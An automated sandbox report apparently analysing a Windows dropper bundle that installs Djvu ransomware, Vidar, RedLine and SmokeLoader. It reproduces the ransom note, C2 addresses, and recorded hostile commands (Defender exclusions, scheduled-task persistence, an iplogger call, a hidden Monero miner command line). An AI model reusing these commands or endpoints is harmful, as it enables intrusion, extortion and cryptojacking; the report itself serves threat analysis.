Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
1204s -
max time network
1204s -
platform
windows10_x64 -
resource
win10-jp -
submitted
20-09-2021 08:28
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Score
10/10
Malware Config
Extracted
Path
C:\_readme.txt
Family
djvu
Ransom Note
ATTENTION!
Don't worry, you can return all your files!
All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.
The only method of recovering files is to purchase decrypt tool and unique key for you.
This software will decrypt all your encrypted files.
What guarantees you have?
You can send one of your encrypted file from your PC and we decrypt it for free.
But we can decrypt only 1 file for free. File must not contain valuable information.
You can get and look video overview decrypt tool:
https://we.tl/t-vtoEIhR0SI
Price of private key and decrypt software is $980.
Discount 50% available if you contact us first 72 hours, that's price for you is $490.
Please note that you'll never restore your data without payment.
Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.
To get this software you need write on our e-mail:
[email protected]
Reserve e-mail address to contact us:
[email protected]
Your personal ID:
0334gSd743dfRiXRqq62TeogIfmpihYZJ6wDmuUVD07WwczX6Bm
URLs
https://we.tl/t-vtoEIhR0SI
Extracted
Family
vidar
Version
40.7
Botnet
706
C2
https://petrenko96.tumblr.com/
Attributes
-
profile_id
706
Extracted
Family
redline
Botnet
janesam
C2
65.108.20.195:6774
Extracted
Family
smokeloader
Version
2020
C2
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
rc4.i32
rc4.i32
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies WinLogon for persistence 2 TTPs 11 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Modifies system executable filetype association 2 TTPs 3 IoCs
-
Process spawned unexpected child process 14 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
-
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 58 IoCs
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
-
Checks BIOS information in registry 2 TTPs 36 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 56 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 1 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 29 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 29 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 36 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
-
Suspicious use of SetThreadContext 31 IoCs
-
Drops file in Program Files directory 33 IoCs
-
Drops file in Windows directory 49 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 24 IoCs
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 19 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 4 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies Internet Explorer settings 1 TTPs 5 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 7 IoCs
-
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 16 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 16 IoCs
-
Suspicious use of SendNotifyMessage 1 IoCs
-
Suspicious use of SetWindowsHookEx 13 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5816 -s 4923⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EAFE971\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0EAFE971\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EAFE971\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe6⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\xp8HI_bx8rPBYFlZRfG1vMN3.exe"C:\Users\Admin\Documents\xp8HI_bx8rPBYFlZRfG1vMN3.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\2lzrdpLz3EwEV8Dc9XpMntEo.exe"C:\Users\Admin\Documents\2lzrdpLz3EwEV8Dc9XpMntEo.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\RGqHgGnaMbL0px6v6Tzt7OjM.exe"C:\Users\Admin\Documents\RGqHgGnaMbL0px6v6Tzt7OjM.exe"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"8⤵
- Checks computer location settings
-
C:\Users\Admin\Documents\BCXZIs8_crQnOQvhpOT2O3vt.exe"C:\Users\Admin\Documents\BCXZIs8_crQnOQvhpOT2O3vt.exe"9⤵
-
-
-
-
C:\Users\Admin\Documents\t0TWzXF0UmHxn2kAnmhu_AuL.exe"C:\Users\Admin\Documents\t0TWzXF0UmHxn2kAnmhu_AuL.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5420 -s 16568⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Users\Admin\Documents\vJsRieSJjWMc0EdygYU_6eeY.exe"C:\Users\Admin\Documents\vJsRieSJjWMc0EdygYU_6eeY.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\vJsRieSJjWMc0EdygYU_6eeY.exeC:\Users\Admin\Documents\vJsRieSJjWMc0EdygYU_6eeY.exe8⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\emWhgHV8U1Es49MkR7UHHWse.exe"C:\Users\Admin\Documents\emWhgHV8U1Es49MkR7UHHWse.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\emWhgHV8U1Es49MkR7UHHWse.exeC:\Users\Admin\Documents\emWhgHV8U1Es49MkR7UHHWse.exe8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\emWhgHV8U1Es49MkR7UHHWse.exeC:\Users\Admin\Documents\emWhgHV8U1Es49MkR7UHHWse.exe8⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\7E47t5OZ9Y2AslGLa71zs0Ko.exe"C:\Users\Admin\Documents\7E47t5OZ9Y2AslGLa71zs0Ko.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\F26HMOE0VyruSatwyckTLw9O.exe"C:\Users\Admin\Documents\F26HMOE0VyruSatwyckTLw9O.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\lWqFOBNzObqshYcVbU9EPdxn.exe"C:\Users\Admin\Documents\lWqFOBNzObqshYcVbU9EPdxn.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 6688⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 6768⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 6528⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 6488⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 11248⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 11568⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 11688⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 12088⤵
- Program crash
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "lWqFOBNzObqshYcVbU9EPdxn.exe" /f & erase "C:\Users\Admin\Documents\lWqFOBNzObqshYcVbU9EPdxn.exe" & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "lWqFOBNzObqshYcVbU9EPdxn.exe" /f9⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Documents\VDKr3kJPXY5MiEh2sgBh3rKq.exe"C:\Users\Admin\Documents\VDKr3kJPXY5MiEh2sgBh3rKq.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"8⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"8⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\uovrLnOqiZlNa82B7YD2cASD.exe"C:\Users\Admin\Documents\uovrLnOqiZlNa82B7YD2cASD.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\uovrLnOqiZlNa82B7YD2cASD.exe"C:\Users\Admin\Documents\uovrLnOqiZlNa82B7YD2cASD.exe"8⤵
- Modifies data under HKEY_USERS
-
-
-
C:\Users\Admin\Documents\bjR2Xj9UB1KeMGiahQDr2ahv.exe"C:\Users\Admin\Documents\bjR2Xj9UB1KeMGiahQDr2ahv.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
C:\Users\Admin\Documents\gubOpckawV9YiBQZQEGZyim0.exe"C:\Users\Admin\Documents\gubOpckawV9YiBQZQEGZyim0.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\gubOpckawV9YiBQZQEGZyim0.exe"8⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK9⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Documents\hnLz9ujGWUUQxBJp7pt3qDvv.exe"C:\Users\Admin\Documents\hnLz9ujGWUUQxBJp7pt3qDvv.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\emBhBCB9JrvjwUss_kimXWYl.exe"C:\Users\Admin\Documents\emBhBCB9JrvjwUss_kimXWYl.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\FElanqa0GqBIMxoehkuxM992.exe"C:\Users\Admin\Documents\FElanqa0GqBIMxoehkuxM992.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "f.exe" & start "" "wwi.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵
-
C:\Users\Admin\AppData\Local\Temp\f.exe"f.exe"9⤵
-
C:\Users\Admin\AppData\Local\237843444.exe"C:\Users\Admin\AppData\Local\237843444.exe"10⤵
- Checks whether UAC is enabled
-
-
-
C:\Users\Admin\AppData\Local\Temp\wwi.exe"wwi.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"9⤵
- Blocklisted process makes network request
-
-
-
-
C:\Users\Admin\Documents\B6srqwApy9H9mq1fCjmNFEFo.exe"C:\Users\Admin\Documents\B6srqwApy9H9mq1fCjmNFEFo.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\B6srqwApy9H9mq1fCjmNFEFo.exe"C:\Users\Admin\Documents\B6srqwApy9H9mq1fCjmNFEFo.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Documents\CbKGQ0u4To8yh2C9mP3J72a5.exe"C:\Users\Admin\Documents\CbKGQ0u4To8yh2C9mP3J72a5.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\7475896.scr"C:\Users\Admin\AppData\Roaming\7475896.scr" /S8⤵
-
-
C:\Users\Admin\AppData\Roaming\2826204.scr"C:\Users\Admin\AppData\Roaming\2826204.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\2634847.scr"C:\Users\Admin\AppData\Roaming\2634847.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EAFE971\Sun19262b9e49ad.exeSun19262b9e49ad.exe6⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EAFE971\Sun193fda712d9f1.exeSun193fda712d9f1.exe6⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EAFE971\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\6331290.scr"C:\Users\Admin\AppData\Roaming\6331290.scr" /S7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\7369647.scr"C:\Users\Admin\AppData\Roaming\7369647.scr" /S7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\4587407.scr"C:\Users\Admin\AppData\Roaming\4587407.scr" /S7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\1700129.scr"C:\Users\Admin\AppData\Roaming\1700129.scr" /S7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EAFE971\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0EAFE971\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 6567⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 6967⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 6647⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 6887⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 8887⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0EAFE971\Sun191101c1aaa.exeSun191101c1aaa.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit10⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'11⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"10⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth10⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\2082185.exe"C:\ProgramData\2082185.exe"9⤵
- Executes dropped EXE
-
-
C:\ProgramData\4824160.exe"C:\ProgramData\4824160.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\496239.exe"C:\ProgramData\496239.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\8445878.exe"C:\ProgramData\8445878.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"10⤵
- Modifies data under HKEY_USERS
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 8009⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 8089⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 8969⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 9609⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 9649⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 8889⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 10489⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 348 -s 15689⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
